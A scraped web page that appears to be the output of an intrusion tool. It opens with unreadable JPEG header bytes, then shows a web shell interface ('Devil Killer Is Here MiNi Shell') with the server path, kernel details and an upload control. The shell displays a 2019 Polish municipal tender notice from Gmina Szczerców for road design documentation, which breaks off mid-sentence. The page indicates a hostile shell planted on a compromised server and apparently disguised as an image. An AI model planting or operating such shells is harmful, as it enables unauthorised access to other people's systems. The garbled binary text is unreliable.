JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20190412/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20190412/537343-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 537343-N-2019 z dnia 2019-04-12 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Szczerców</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Opracowanie dokumentacji projektowych na terenie Gminy Szczerców</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"> </span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Szczerców</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">54585700000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Pułaskiego</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">8</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">97-420</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Szczerców</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">łódzkie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">446 318 059</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">inwestycje@szczercow.org</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">446 318 079</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">szczercow.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej">www.szczercow.pl</span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">e-bip.pl/start/54</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">http://www.e-bip.pl/start/54</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Pisemnie na adres wskazany poniżej</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Gmina Szczerców ul. Pułaskiego 8 97-420 Szczerców Polska</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Opracowanie dokumentacji projektowych na terenie Gminy Szczerców</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">RI.2.271.1.1.2019</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Opracowanie dokumentacji projektowych pn.: Część 1:1. Remont drogi gminnej Nr G22 w m-ci Brzezie o dł, ok. 680mb. Podziały działek - ok 48szt. 2. Przebudowa drogi wewnętrznej w m. Podklucze o dł. ok 650mb. Podziały działek - ok 33szt. 3. Przebudowa drogi wewnętrznej w m. Grudna o dł. ok. 650mb. Podziały działek - ok 21szt. Wykonanie dokumentacji projektowo-kosztorysowej obejmuje:1. Uregulowanie pasa drogowego budowanej/rozbudowywanej drogi.2. Ulepszenie nawierzchni jezdni, wzmocnienie konstrukcji lub zastosowanie innych powszechnie stosowanych rozwiązań. Jednostka projektowania zaproponuje wariant wzmocnienia nawierzchni jezdni wraz z podaniem między innymi: szczegółowej technologii wykonania, trwałości konstrukcji.4. Budowa zjazdów (indywidualnych, publicznych) do działek przyległych do pasa drogowego, Jednostka projektowania uzgodni lokalizację zjazdów z właścicielami terenu przyległego do projektowanego pasa drogowego.5. Budowa zjazdów publicznych poprzez zaprojektowanie wlotów w istniejące drogi wewnętrzne, zwiększenie bezpieczeństwa poprzez prawidłowe przeprojektowanie wlotów dróg wewnętrznych.6. Budowa odwodnienia układu drogowego - częściowo (w rejonie skrzyżowań i miejscach trudnych z uwagi na istniejącą infrastrukturą) w postaci kanalizacji deszczowej, częściowo w postaci rowów przydrożnych umocnionych i nieumocnionych, budowa odprowadzenia wód deszczowych do odbiorników wód (Jednostka projektowania ma w swoim zakresie doprowadzenie wód deszczowych do np.: zbiornika istniejącego, wybudowanie nowego zbiornika, kanału, rowu melioracyjnego itp. łącznie z zaprojektowanie budowy/przebudowy urządzeń i obiektów wodnych), Jednostka projektowania winna przeanalizować obszar w bezpośrednim sąsiedztwie przedmiotowej drogi i wybrać najbardziej optymalne rozwiązanie.7. Rozwiązanie wszystkich niezbędnych kolizji (odrębne opracowania - wydzielenie z danej branży w podziale na właścicieli kolidujących obiektów).8. Budowa/przebudowa przepustów pod drogą.9. Zabezpieczenie istniejącej infrastruktury.10. Inwentaryzacja drzewostanu do usunięcia (odrębne opracowanie) jeżeli jest wymagane.11. Wykonanie projektu docelowej organizacji ruchu.12. Wykonanie podziału działek pod poszerzenie (wydzielenie) pasa drogowego, który będzie stanowić załącznik do wniosku o wydanie decyzji ZRID. Zakres wydzielenia pasa drogowego winien zawierać również teren pod infrastrukturę projektowaną będącą również wynikiem rozwiązania zaistniałych kolizji. Dokładna ilość działek zostanie określona na etapie sporządzania map d/c projektowych.Pozostałe warunki ogólne:1. Prace projektowe należy przeprowadzić w oparciu o ustawę z 10 kwietnia 2003r o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (Dz. U. z 2003r. Nr 80 poz. 721). 2. Pozyskanie niezbędnych decyzji administracyjnych, a w szczególności pozwolenia wodno-prawnego jeżeli przepisy będą wymagały jego sporządzenia (operat wodnoprawny jest integralna częścią dokumentacji projektowej), decyzji zarządcy drogi oraz pozostałych wynikających z przepisów szczegółowych.3. Pozyskanie niezbędnych uzgodnień, warunków technicznych i opinii, zezwoleń na realizację inwestycji drogowej,4. Wykonanie badań geotechnicznych dla zadań.5. Wykonanie kompletnej dokumentacji projektowej w szczególności: projektów budowalnych, projektów wykonawczych, specyfikacji technicznych, przedmiarów robót, kosztorysów inwestorskich w podziale na poszczególne branże.6. Kompletne dokumentacje dotyczące ewentualnych kolizji z obiektami i sieciami.7. Mapa do celów projektowych - do wykonania po stronie Jednostki projektowania. Mapy do celów projektowych po ich zatwierdzeniu w Starostwie Powiatowym w Bełchatowie Jednostka projektowania przekaże w 1 egz. w wersji papierowej oraz 1 egz. wersji elektronicznej Zamawiającemu.8. Projekty techniczne winny być opracowane w sposób umożliwiający zrealizowanie zamierzenia z uwzględnieniem rodzaju i asortymentu materiałów koniecznych do wbudowania i uzyskania najwyższej jakości dróg i infrastruktury technicznej w oparciu o obowiązujące w tym zakresie normy i przepisy szczegółowe.9. Przed złożeniem oferty należy zapoznać się z zakresem prac projektowych, ewentualnej wizji w terenie i na tej podstawie złożyć dopiero ofertę.10. Wykonanie dokumentacji projektowej rozwiązującej zaistniałe kolizje z istniejącym uzbrojeniem, a niezbędne do wykonania prawidłowo zadania leży po stronie Jednostki projektowania.11. Kompletną dokumentację projektową w zakresie projektów budowlanych, projektów wykonawczych, operatów wodnoprawnych itp. w podziale na poszczególne branże i operatorów sieci (w zakresie kolizji) - po 6 egz. jeżeli zajdzie taka potrzeba.12. Kosztorysy inwestorskie w podziale na poszczególne branże i operatorów sieci (w zakresie kolizji) - po 2 egz. W przypadku nie ogłoszenia przetargu na wykonanie robót objętych przedmiotowymi dokumentacjami projektowymi w przeciągu 6 miesięcy od daty protokólarnego przekazania przedmiotu zamówienia Jednostka projektowania jest zobowiązana na wniosek Inwestora przez okres 18 miesięcy od daty przekazania niniejszych kosztorysów do przeliczenia (zaktualizowania cen) przekazanych kosztorysów inwestorskich i dostarczenia Zamawiającemu w 2 egz..13. Przedmiary robót (kosztorysy ślepe) w podziale na poszczególne branże i operatorów sieci (w zakresie kolizji) - po 2 egz.14. Kompletną specyfikację techniczną odbioru i wykonania robót w podziale na poszczególne branże i operatorów sieci (w zakresie kolizji) - po 2 egz15. Wersję elektroniczną (edytowalna i nieedytowalną) kompletnej dokumentacji projektowej wraz z kosztorysami, specyfikacjami, wszystkimi uzgodnieniami, opiniami, decyzjami, zezwoleniami i opracowaniami w podziale na poszczególne branże i operatorów sieci (w zakresie kolizji) - po 3 egz. na płycie CD-R (kompletna wersja elektroniczna(nieedytowalna) w formacie PDF winna być możliwa do wydruku w skali oraz rysunki w formacie DWG). 16. Jednostka projektowa będzie zobowiązana do udziału w trakcie prowadzonego przez Zamawiającego postępowaniu przetargowym na wyłonienie Wykonawcy robót budowlanych (m.in. niezwłoczne udzielanie wyjaśnień do SIWZ).17. Dokumentacja projektowa wraz ze wszystkimi jej elementami (m.in.: kosztorysami i specyfikacjami technicznymi) winna spełniać wymogi ustawy o zamówieniach publicznych. Jednostka projektowania w dokumentacji projektowej zawrze szczegółowe informacje co do wszystkich istotnych parametrów zastosowanych materiałów i urządzeń. Należy podać minimalne wymagane parametry równoważności zastosowanych materiałów.18. Pozyskanie niezbędnych decyzji administracyjnych (np.: decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia, pozwolenia wodno-prawnego, decyzji wydawanych przez zarządcę drogi będącej przedmiotem zamówienia itp.) wymagane przepisami szczegółowymi, wszystkich niezbędnych opinii, uzgodnień i pozwoleń leży po stronie Jednostki projektowania.19. Prace projektowe należy przeprowadzić w oparciu o Ustawę Prawo budowlane oraz Ustawę Prawo zamówień publicznych. W dokumentacji projektowej Jednostka projektowania zastosowane materiały opisze parametrami technicznymi bez podawania znaków towarowych bądź wskazania na konkretnych producentów. Niezastosowanie się do niniejszego skutkować będzie potraktowanie przez Zamawiającego wykonanej dokumentacji projektowej jako niezgodna z umową i wezwanie do doprowadzenia przedmiotu umowy do stanu zgodnego z zawartą umową.20. Pełnienie nadzoru autorskiego podczas wykonywania robót objętych projektem. 21. Wykonanie dokumentacji projektowej w sposób umożliwiający zrealizowanie zamierzenia z uwzględnieniem rodzaju i asortymentu materiałów koniecznych do wbudowania i uzyskania najwyższej jakości infrastruktury w oparciu o obowiązujące w tym zakresie normy i przepisy szczegółowe z Ustawą prawo zamówień publicznych włącznie. 22. Pozyskanie niezbędnych decyzji administracyjnych wymaganych przepisami szczegółowymi, wszystkich niezbędnych opinii, uzgodnień i pozwoleń leży po stronie Jednostki projektowania,23. Niezwłoczne udzielanie odpowiedzi i wyjaśnień dotyczących dokumentacji projektowej w trakcie prowadzonego przez Zamawiającego postępowania przetargowego na wyłonienie Wykonawcy robót budowlanych.24. Uczestnictwo w naradach koordynacyjnych na etapie prac projektowych i jeżeli będzie taka konieczność na etapie realizacji inwestycji na wezwanie Zamawiającego bez dodatkowego wynagrodzenia.25. Uzupełnianie dokumentacji projektowej w zakresie związanym z ewentualnymi brakami wcześniej wykonanej dokumentacji oraz wyjaśnienie wątpliwości powstałych w toku realizacji inwestycji.26. Wprowadzanie do dokumentacji wszelkich zmian, jeżeli wynikają one z wad opracowań przygotowanych przez Jednostkę projektowania lub osoby, którymi się posługuje.Opracowanie dokumentacji projektowych pn.: Część 2:1. Koncepcja projektu drogowego oraz ścieżki rowerowej - Sołectwo Stanisławów Pierwszy o dł. ok 2850mb. 2. Przebudowa drogi w m-ci Zagadki o dł. 560mb. 3. Budowa drogi wewnętrznej Żabczanka-Podżar o dł. ok 700mb. Wykonanie dokumentacji projektowo-kosztorysowej obejmuje:1. Ulepszenie nawierzchni jezdni, wzmocnienie konstrukcji lub zastosowanie innych powszechnie stosowanych rozwiązań. Jednostka projektowania zaproponuje wariant wzmocnienia nawierzchni jezdni wraz z podaniem między innymi: szczegółowej technologii wykonania, trwałości konstrukcji.2. Budowa/przebudowa przepustów pod drogą.3. Pozyskanie niezbędnych uzgodnień, warunków technicznych i opinii, zezwoleń w celu uzyskania pozwolenia na budowę lub zgłoszenia nie wymagającego pozwolenia na budowę.4. Wykonanie badań geotechnicznych dla zadania.5. Wykonanie kompletnej dokumentacji projektowej w szczególności: projektów budowalnych, projektów wykonawczych, specyfikacji technicznych, przedmiarów robót, kosztorysów inwestorskich.6. Mapa do celów projektowych - do wykonania po stronie Jednostki projektowania. Mapy do celów projektowych po ich zatwierdzeniu w Starostwie Powiatowym w Bełchatowie Jednostka projektowania przekaże w 1 egz. w wersji papierowej oraz 1 egz. wersji elektronicznej Zamawiającemu.7. Projekty techniczne winny być opracowane w sposób umożliwiający zrealizowanie zamierzenia z uwzględnieniem rodzaju i asortymentu materiałów koniecznych do wbudowania i uzyskania najwyższej jakości dróg i infrastruktury technicznej w oparciu o obowiązujące w tym zakresie normy i przepisy szczegółowe.8. Przed złożeniem oferty należy zapoznać się z zakresem prac projektowych, ewentualnej wizji w terenie i na tej podstawie złożyć dopiero ofertę.9. Kompletną dokumentację projektową w zakresie projektów budowlanych, projektów wykonawczych, zecyzji zwalniających. 10. Kosztorysy inwestorskie w podziale na poszczególne branże i operatorów sieci (w zakresie kolizji) - po 2 egz. W przypadku nie ogłoszenia przetargu na wykonanie robót objętych przedmiotowymi dokumentacjami projektowymi w przeciągu 6 miesięcy od daty protokólarnego przekazania przedmiotu zamówienia Jednostka projektowania jest zobowiązana na wniosek Inwestora przez okres 18 miesięcy od daty przekazania niniejszych kosztorysów do przeliczenia (zaktualizowania cen) przekazanych kosztorysów inwestorskich i dostarczenia Zamawiającemu w 2 egz..11. Przedmiary robót (kosztorysy ślepe) w podziale na poszczególne branże i operatorów sieci (w zakresie kolizji) - po 2 egz.12. Kompletną specyfikację techniczną odbioru i wykonania robót - 2 egz.13. Wersję elektroniczną (edytowalna i nieedytowalną) kompletnej dokumentacji projektowej wraz z kosztorysami, specyfikacjami, wszystkimi uzgodnieniami, opiniami, decyzjami, zezwoleniami i opracowaniam - 1 egz. na płycie CD-R (kompletna wersja elektroniczna(nieedytowalna) w formacie PDF winna być możliwa do wydruku w skali oraz rysunki w formacie DWG). 14. Jednostka projektowa będzie zobowiązana do udziału w trakcie prowadzonego przez Zamawiającego postępowaniu przetargowym na wyłonienie Wykonawcy robót budowlanych (m.in. niezwłoczne udzielanie wyjaśnień do SIWZ).15. Dokumentacja projektowa wraz ze wszystkimi jej elementami (m.in.: kosztorysami i specyfikacjami technicznymi) winna spełniać wymogi ustawy o zamówieniach publicznych. Jednostka projektowania w dokumentacji projektowej zawrze szczegółowe informacje co do wszystkich istotnych parametrów zastosowanych materiałów i urządzeń. Należy podać minimalne wymagane parametry równoważności zastosowanych materiałów.16. Prace projektowe należy przeprowadzić w oparciu o Ustawę Prawo budowlane oraz Ustawę Prawo zamówień publicznych. W dokumentacji projektowej Jednostka projektowania zastosowane materiały opisze parametrami technicznymi bez podawania znaków towarowych bądź wskazania na konkretnych 